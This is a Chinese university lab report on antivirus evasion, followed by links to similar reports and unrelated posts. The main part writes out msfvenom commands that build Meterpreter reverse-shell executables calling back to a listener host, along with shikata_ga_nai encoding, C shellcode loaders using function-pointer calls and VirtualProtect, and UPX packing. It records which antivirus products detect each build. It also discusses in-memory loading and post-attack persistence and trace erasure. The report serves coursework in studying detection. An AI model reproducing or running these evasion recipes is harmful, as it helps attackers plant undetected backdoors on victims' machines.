2017-2018-2 20155228 《网络对抗技术》 实验三:MAL_免杀原理与实践

实验内容

  1. 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)

  2. 通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

  3. 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)

基础问题回答

1. 杀软是如何检测出恶意代码的?

  • 基于特征码

基于特征码检测恶意代码举例:

“wannacry”访问特定的空的url测试是否被人注意到,杀毒软件av在检测恶意代码时就可以通过检测是否有访问特定的url的特征码判断是否是恶意代码

入侵检测系统IDS对包的检测:从外部流向内部特定端口的包,在已经建立tcp连接的情况下,如果IDS发现有特定字符串(特征码)就会认为系统被攻击

基于特征码检测恶意代码就要求杀毒软件商建立尽可能大的特征库

  • 启发式

特征码是可以清晰判断恶意代码的,而启发式是一种模糊匹配,如果发现有行为的问题,就会认为是恶意代码

启发式与特征码的比较:

特征码的研究落后,就是说只有恶意代码出现后才能有对应的特征码出现,但是特征码有通用性;

启发式的判断标准是一个问题即在什么情况下认为是恶意代码并提出报告,另外启发式会有更大的系统开销。

  • 基于行为
基于行为可以认为是引入行为监控的启发式

2. 免杀是做什么?

一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。

3. 免杀的基本方法有哪些?

  • 改变特征

  • 改变行为

除了常见的反弹连接、隧道、加密之外,杀毒软件av经常是在读写硬盘时检查恶意代码,就可以考虑直接把恶意代码读入内存

另外可以先把恶意代码组成一个简单的通信模块避开杀毒软件的检测,然后通过下载热补丁的方式把功能模块从网上下载下来

在软件开发阶段就故意留下的漏洞,在需要时对漏洞进行攻击,这是杀毒软件难以防范的

通过独立开发的方式开发不流行的恶意代码也是杀毒软件难以发现得

实践总结与体会

单独使用Msfvenom编码器多次编码的免杀效果和不做编码的免杀效果相比并没有优势

在本次实验中用了多种免杀,半手工编写C语言调用Shellcode打造恶意软件的免杀效果是最好的

但是用virusscan检测还是会有一些杀毒软件会判定是恶意代码,所以希望通过多种方式组合看看能不能提高免杀效果

根据实验指导书里提供的思路,首先考虑的是对shellcode本身进行处理

之前用编码器进行编码是一种处理方式,但是效果并不好,这是可能是因为编码本身就带有特征

假设:杀毒软件是基于代码特征来判断恶意代码

就要把代码特征处理掉,也许并不需要复杂的加密运算,按位异或或者直接把代码调整一下顺序应该就可以了

验证一下猜想

1. 在使用msfvenom生成shellcode,不写后门而是写一个简单的helloworld,把shellcode定义为一个常量并不使不用

程序运行起来了,360并没有提示

那么360应该不是通过检查读入内存的数据来判断恶意代码的

2. 用shellcode写后门程序编译生成控制台程序

程序运行的时候没有提示,但是结束运行之后有提示

3. 对shellcode进行简单移位处理,这也可以认为是用古典密码移位密码算法进行加密

本来猜测360应该是应该有提示的,但是事实上并没有,因为这一步的程序的行为和上一步的是一样的,只是对shellcode做了一点处理

所以估计360对恶意代码的判断应该是综合考虑行为特征和代码特征才做出的判断,单独的代码特征和行为特征都不能让360认定是恶意代码

离实战还缺些什么技术或步骤

网络攻击分为预攻击,攻击,后攻击三个阶段

首先是预攻击:要对目标做信息搜集和分析,获取对方的操作系统、网络结构、域名、IP、端口和服务情况等等,分析信息,发掘漏洞,寻找突破口

然后是攻击:本次实验的主要内容是构建恶意代码,而如何将恶意代码植入目标的计算机中也是这个阶段的任务

最后是后攻击:攻击成功后要做善后处理,擦除痕迹,保证后门长期存在并可用且不被发现

实践过程记录

1. Msfvenom使用编码器

MsfvenomMetasploit平台下用来编码payloads免杀的工具

首先使用msfvenom直接生成meterpreter可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.131 PORT=443 -f exe > 5228met.exe

VirusScan测试结果

然后使用msfvenom编码生成meterpreter可执行文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.232.131 LPORT=443 -f exe > 5228met-encoded.exe

VirusScan测试结果

最后使用msfvenom多次编码生成meterpreter可执行文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -i 10 -b ‘\x00’ LHOST=192.168.232.131 LPORT=443 -f exe > 5228met-encoded10.exe

VirusScan测试结果

2. Veil-Evasion

3. C语言调用Shellcode

通过半手工的方式打造恶意软件

3.1 Linux平台交叉编译Windows应用

首先使用msfvenom生成shellcode数组

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.131 LPORT=443 -f c

然后使用gedit用编写c语言恶意代码5228met-CrossCompling.c

unsigned char buf[]=

//省略的shellcode数组具体内容

int main()

{

    int (*func)()=(int(*)())buf;

    func();

}

最后使用mingw-w64将c语言文件生成exe文件

i686-w64-mingw32-g++ 5228met-CrossCompling.c -o 5228met-CrossCompling.exe

如果提示找不到命令的话就是没有安装mingw-w64,通过以下命令进行安装mingw-w64

apt-get update

apt-get install mingw-w64

VirusScan测试结果

360杀毒测试结果

360杀毒检测恶意代码的方式比较玄学,直接对恶意代码右键进行扫描并不会发现这是恶意代码,但是恶意代码就放着不运行,过一会360杀毒就会提示发现恶意代码

我估计右键扫描和定期扫描的检测方式不太一样,考虑到是不运行的情况下检测出恶意代码,那么应该就不存在行为检测,而是特征码匹配得出的结果。

MicrosoftSercurityEssential测试结果

3.2 VisualStudio

首先使用msfvenom生成shellcode数组

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.131 LPORT=443 -f c

其次使用VisualStudio编写c语言恶意代码

注意生成shellcode数组是unsigned char buf[]而代码中的数组是const char met[]

// callshellcode.cpp : 定义控制台应用程序的入口点。

#include "stdafx.h"

#include <windows.h>

#include <winbase.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

const char met[] =

//省略的shellcode数组具体内容

int main()

{

	DWORD old = 0;

	BOOL ret = VirtualProtect((LPVOID)met, strlen(met), PAGE_EXECUTE_READWRITE, &old);

	INT32 * addr;

	addr =(INT32*) &met;

	__asm;

	{

		call addr;

	}

	return 0;

}

然后编译运行

连接测试结果

最后生成exe文件

在项目属性-->配置属性-->C/C++-->代码生成-->运行时库设置为多线程调试(/MTd)-->确定

确定之后,再重新编译一次便可以将生成的exe,在没有安装vs2008的机器上使用。这种设置是将项目所有的代码、需要的库文件全部都加入到生成的exe中,也可发现,这种设置的exe文件比较大。

另外,还可以看见,在下拉菜单中,还有一个选项:“多线程(/MT)” ,这个选项也是将所需要的一些文件、代码全部都打包进exe,但是是生成没有调试信息的exe。mtd是添加了调试信息的,mt是没有添加调试信息的。

连接测试结果

360杀毒测试结果

VirusScan测试结果

4. 加壳

4.1 压缩壳UPX

upx 5228met.exe -o 5228metupxed.exe

VirusScan测试结果

4.2 加密壳Hyperion

PSP时间统计

步骤 耗时 百分比
需求分析 20min 8%
设计 40min 16%
代码实现 120min 50%
测试 20min 8%
总结分析 40min 16%

2017-2018-2 20155228 《网络对抗技术》 实验三:MAL_免杀原理与实践的更多相关文章

  1. 2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理与实践

    #2017-2018-2 <网络对抗技术> 20155322 Exp3 免杀原理与实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实 ...

  2. 2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践

    2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践 一 免杀原理与实践说明 (一).实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件, ...

  3. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践

    2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...

  4. 2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践

    2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践 免杀原理及基础问题回答 免杀 1. 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践

    2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...

  6. 2017-2018-2 『网络对抗技术』Exp3:免杀原理与实践

    1. 免杀原理与实践说明 一.实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) ...

  7. 网络对抗技术 2017-2018-2 20152515 Exp3 免杀原理与实践

    基础问题回答 (1)杀软是如何检测出恶意代码的? 答:分析恶意程序的行为特征,分析其代码流将其性质归类于恶意代码. (2)免杀是做什么? 答:一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测 ...

  8. 2017-2018-2 20155315《网络对抗技术》Exp3:免杀原理与实践

    实验目的 通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力. 教程 实验内容 使用msf编码器,msfvenom,veil-evasion,shellcode编程等免杀工具 ...

  9. 20155229《网络对抗技术》Exp3:免杀原理与实践

    实验预习 免杀: 看为一种能使病毒木马避免被杀毒软件查杀的技术. 免杀的分类: 开源免杀:指在有病毒.木马源代码的前提下,通过修改源代码进行免杀.. 手工免杀:指在仅有病毒.木马的可执行文件(.exe ...

随机推荐

  1. 20172310 蓝墨云ASL测试 2018-1938872

    20172310 蓝墨云ASL测试 2018-1938872 题目: 已知线性表具有元素{5,13,19,21,37,56,64,75,80,88,92},如果使用折半查找法,ASL是多少? 解答:( ...

  2. 小甲鱼Python第二十三讲课后习题--025,字典

    笔记: 1.字典是Python中唯一的映射类型 2.字典包含两个要素:键(key)和值(value)他们是成对出现的,用大括号括起来,多对存在时用逗号隔开. 3.可以用dict()直接创建字典,如di ...

  3. Vue(二十六)父子组件通信

    今天写了一个分页公共组件,就出现了父子组件通信的问题,今天来总结下我遇到的父子组件通信问题 一.子组件调取父组件的数据或方法 (1)props 想要把父组件的值,传到子组件中,使用props 比如你在 ...

  4. springmvc 学习资料

    https://github.com/brianway/springmvc-mybatis-learninghttps://www.bilibili.com/video/av18288362?from ...

  5. webpack打包 基础

    001.什么是webpack? 作用有哪些? WebPack可以看做是模块打包机:它做的事情是,分析你的项目结构,找到JavaScript模块以及其它的一些浏览器不能直接运行的拓展语言(Scss,Ty ...

  6. centos7安装mysql8

    1.检查系统是否有安装mysql或mariadb,如果有则删除 2.yum localinstall https://repo.mysql.com//mysql80-community-release ...

  7. vim删除.swp

    非正常关闭vi编辑器时会生成一个.swp文件 关于swp文件 使用vi,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件以备 ...

  8. 原生js实现table表格列宽自由缩放

    <!DOCTYPE html> <html> <head> <meta charset="gbk"> <title>ta ...

  9. LVS,Keepalived,HAproxy区别与联系

    LVS,Keepalived,HAproxy区别与联系 LVS 全称Linux Virtual Server,也就是Linux虚拟服务器,由章文嵩(现就职于于淘宝,正因为如此才出现了后来的fullna ...

  10. Google 内部代码是不支持异常(Excepton)的,C++ 异常的优劣之处有许多讨论(知乎上的讨论)

    最近 Google 开源了其内部多年使用的 C++ 代码库 Abseil 作为 C++ 标准库的补充,并会对其进行持续更新,本文对其进行简要介绍. 一句话概括,这个库的特点是用 C++ 11 的代码实 ...